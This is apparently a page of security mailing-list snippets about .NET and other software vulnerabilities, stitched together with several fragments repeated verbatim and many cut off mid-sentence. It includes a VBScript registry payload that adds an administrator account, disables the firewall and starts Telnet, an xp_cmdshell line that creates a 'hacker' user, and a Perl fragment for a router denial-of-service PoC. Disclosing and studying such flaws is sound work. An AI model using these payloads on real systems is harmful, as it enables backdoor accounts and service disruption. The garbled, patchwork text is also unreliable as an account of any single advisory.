Next Page >>
net
------------------------------------------------------------------------
.NET Framework EncoderParameter integer overflow vulnerability
------------------------------------------------------------------------
Yorick Koster, September 2011
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
An integer overflow vulnerability has been discovered in the
EncoderParameter class of the .NET Framework. Exploiting this
Yorick Koster, June 2010
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A logic flaw has been found in the way .NET grants permissions to
ClickOnce applications. Combined with relaxed security warnings when
handling OLE Packages in Office 2007 allows for attackers to run
arbitrary .NET assemblies with Full Trust permissions.
------------------------------------------------------------------------
3. *Vulnerability Description*
Novell iManager is a Web-based administration console that provides
customized secure access to network administration utilities and
content from any location in the world. With iManager you can manage
Novell Open Enterprise Server, Novell Identity Manager, Novell
eDirectory and many other Novell and third-party services from a web
browser. Novell iManager is prone to a stack-based buffer overflow
vulnerability that can be exploited by authenticated users to execute
SEC Consult Vulnerability Lab Security Advisory < 20111230-0 >
=======================================================================
title: Microsoft ASP.NET Forms Authentication Bypass
product: Microsoft .NET Framework
vulnerable version: Microsoft .NET Framework Version:4.0.30319;
ASP.NET Version:4.0.30319.237 and below
fixed version: MS11-100
CVE: CVE-2011-3416
impact: critical
homepage: http://www.microsoft.com/net
I respectfully defend our statement as very realistic. The .Net exploit provided in the advisory is all that is required to work; no code-behind is required because the vulnerability related to "innerhtml" lies in the .Net code.
The specific flaw is actually in System.Web.UI.HTMLControls.HtmlContainerControl class, which is the super class of the HTMLForm control (among others). The bug is easy to spot in the LoadViewState method as revealed in .Net Reflector:
protected override void LoadViewState(object savedState)
{
if (savedState != null)
{
base.LoadViewState(savedState);
Vendor informed: 13th December 2007
Severity: Medium-high
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services
Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.
Vendor informed: 13th December 2007
Severity: Medium-high
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services
Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.
Vendor informed: 13th December 2007
Severity: Medium-high
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services
Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.
Vendor informed: 13th December 2007
Severity: Medium-high
Successfully tested on: RSA Authentication Agent 5.3.0.258 for Web for
Internet Information Services
Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.
We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7 . In this blog post, we will look into the details of a number of
security problems discovered by Acunetix WVS in CubeCart.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3;
Hi,
Please find the following Advisory
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=37
Regards
DokFLeed
====================================================
Advisory No.: ISNSC-0910
=============
ChartDirector Critical File Access
> GET /index.php?page=Poem/Poem.php HTTP/1.1
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
...and how did you confirm that? By seeing Silverlight in the accepted
mime-types header? Silverlight is a plugin which is a lot like the Flex
framework for Flash, only for .Net. So, I guess you have a Silverlight
application installed to play .WAV files, but this does not change the
fact that anything outside of IE (which has the Silverlight extension
installed) will use whatever the default media player is on your PC.
> Accept-Language: en-au
While discussion of the vulnerability is great, it would be nice for us to retain some credit; the advisory represents the culmination of a lot of research work. The PDF that accompanies the hacking-lab movie is basically just a copy & paste from our advisory with no attribution. Anyone that goes to the hacking-lab website directly would incorrectly assume that the movie & PDF represent original research work by Compass Security.
I imagine that videos of our BlackHat presentation (http://www.blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Byrne ) will hit the web soon too. We have a live demo of the .Net vulnerability and the JavaServer Faces exploit.
Thanks,
David Byrne
Senior Security Consultant
Trustwave - SpiderLabs, Application Security
#######################################################################
Luigi Auriemma
Application: MG-SOFT Net Inspector
http://www.mg-soft.com/netinsp.html
(bug C affects any MgWTrap3 service which is included in
almost all the MG-SOFT products like MIB Browser, Query
Manager, Trap Ringer Pro and so on)
Versions: Net Inspector <= 6.5.0.828
1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec
The CFP committee will review all submissions and determine the final
list of speakers for SyScan’08.
CONFERENCE TOPICS
The focus for SyScan’08 will include the following:
> Your paper seems to say you only tested this on IE 5.5 and IE6 (no
> mention of IE7), so does is that the case, or am I just doing it
> wrong?
>
> 2008/8/22 ProCheckUp Research <research@procheckup.com>:
> The Microsoft .NET framework comes with a request validation feature,
> configurable by the ValidateRequest setting. ValidateRequest has been a
> feature of ASP.NET since version 1.1. This feature consists of a series
> of filters, designed to prevent classic web input validation attacks
> such as HTML injection and XSS (Cross-site Scripting). This paper
> introduces script injection payloads that bypass ASP .NET web validation
Hi all,
There is an ongoing conversation about a potential XSS with ViewState of
the .NET framework. However, some were not able to reproduce the issue
and therefore we decided to prepare a short and high resolution movie.
http://www.hacking-lab.com/download/
Regards
Ivan
(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate.
Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
Paper Name
===========
.NET Framework Rootkits - Backdoors inside your Framework
Author: Erez Metula
Paper Description
=================
GET /index.php?page=Poem/Poem.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
Accept-Language: en-au
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Host: www.footprints-inthe-sand.com
Connection: Keep-Alive
It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)
1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec
The CFP committee will review all submissions and determine the final
list of speakers for SyScan’08.
CONFERENCE TOPICS
The focus for SyScan’08 will include the following:
1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec
The CFP committee will review all submissions and determine the final
list of speakers for SyScan’08.
CONFERENCE TOPICS
The focus for SyScan’08 will include the following:
Updated:
Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)
Bug Description :
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc...) in its HTTP service.
POC:
#-------------------------------------------------------------
Accept: */*
Accept-Language: ru
Referer: http://127.0.0.1:8080/index.php
Content-Type: application/x-www-form-urlencoded;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)
Host: 127.0.0.1:8080
Content-Length: 105
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=sa3erabjgpcqnfn4k8eutgark0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The Microsoft .NET framework comes with a request validation feature,
configurable by the ValidateRequest setting. ValidateRequest has been a
feature of ASP.NET since version 1.1. This feature consists of a series
of filters, designed to prevent classic web input validation attacks
such as HTML injection and XSS (Cross-site Scripting). This paper
introduces script injection payloads that bypass ASP .NET web validation
filters and also details the trial-and-error procedure that was followed
*About SyScan'08*
The Symposium on Security for Asia Network aims to be a very different
security conference from the rest of the security conferences that the
information security community in Asia has come to be so familiar and
frustrated with.
SyScan is a non-product, non-vendor biased security conference. It is
the aspiration of SyScan to congregate in Asia the best security experts
in their various fields, to share their research, discovery and
experience with all security enthusiasts in Asia.
<script language='vbscript'>
group="HKEY_LOCAL_MACHINE"
section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
key="sun-tzu"
valType=1 'REG_SZ
value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config TlntSvr start= auto & net start TlntSvr & echo whatthefuck(!) & pause" 'you meretrix...
HPRevolutionRegistryManager.WriteRegistry group ,section ,key ,valType ,value 'die of miserable death mommy
</script>
</html>
original url: http://retrogod.altervista.org/telecom_regkey.html
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
> a password on the hidden admin account.
In XP Professional default admin account is not hidden, only in XP Home
Edition. And default admin password can be changed not only in safe mode,
but in normal mode from any admin account (in both XP Professional and XP
HE). Particularly it can be done in command prompt with "net" command.
> Try the "net user password ..." command (from the CMD prompt). That'll
> save you from having to do it in safe mode.
Garrett, you mean the next command:
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt
Published: 04/11/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Next Page>>
|
